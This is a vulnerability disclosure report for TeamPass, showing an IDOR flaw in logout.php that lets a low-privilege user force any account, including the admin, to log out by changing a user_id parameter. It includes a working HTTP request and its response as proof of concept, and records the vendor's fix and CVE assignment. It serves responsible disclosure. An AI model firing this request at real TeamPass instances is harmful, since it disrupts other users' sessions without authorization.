IDOR Vulnerability Allow Low-Level User Logout Everyone Includes Admin in nilsteampassnet/teampass

Valid

Reported on

Feb 28th 2023

Description

IDOR vulnerability allow low level user to log out everyone in the system by changing the user ID.

Proof of Concept

Step 1: Login in as admin

Step 2: Go to user and add an user. Set role to Default.

Step 3: Login as the new user.

Step 4: Logout the user

GET /teampass/includes/core/logout.php?user_id=10000001 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: 4a5b833fa554df2e84c76e5cd45ce14cd307ceebac65bd2722=569d0d699362872a0cb318b102a9c98e6e36a30f11823ec5a1; teampass_session=r511n6jfa0dqvm7jpjcipmdc1a; jstree_select=2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Change the user_id to any other id. For this example, we use 1 as admin user_id

Below is the response of the request submitted at above.

HTTP/1.1 200 OK
Date: Tue, 28 Feb 2023 07:25:00 GMT
Server: Apache/2.4.54 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 526
Connection: close
Content-Type: text/html; charset=utf-8


    <script type="text/javascript" src="../../plugins/store.js/dist/store.everything.min.js"></script>
    <script language="javascript" type="text/javascript">
    <!--
        // Clear localstorage
        store.remove("teampassApplication");
        store.remove("teampassSettings");
        store.remove("teampassUser");
        store.remove("teampassItem");
        sessionStorage.clear();
        
        setTimeout(function() {
            document.location.href="../../index.php"
        }, 1);
    -->
    </script>

Step 5: Admin has logged out

Impact

An attacker can logged everyone out from the system without the victim knowing.

References

We are processing your report and will contact the nilsteampassnet/teampass team within 24 hours. a month ago
choocs modified the report
a month ago
We have contacted a member of the nilsteampassnet/teampass team and are waiting to hear back a month ago
nilsteampassnet validated this vulnerability 14 days ago
choocs has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
nilsteampassnet marked this as fixed in 3.0.0.23 with commit 4e06fb 14 days ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
nilsteampassnet published this vulnerability 14 days ago
logout.php#L35-L102 has been validated
to join this conversation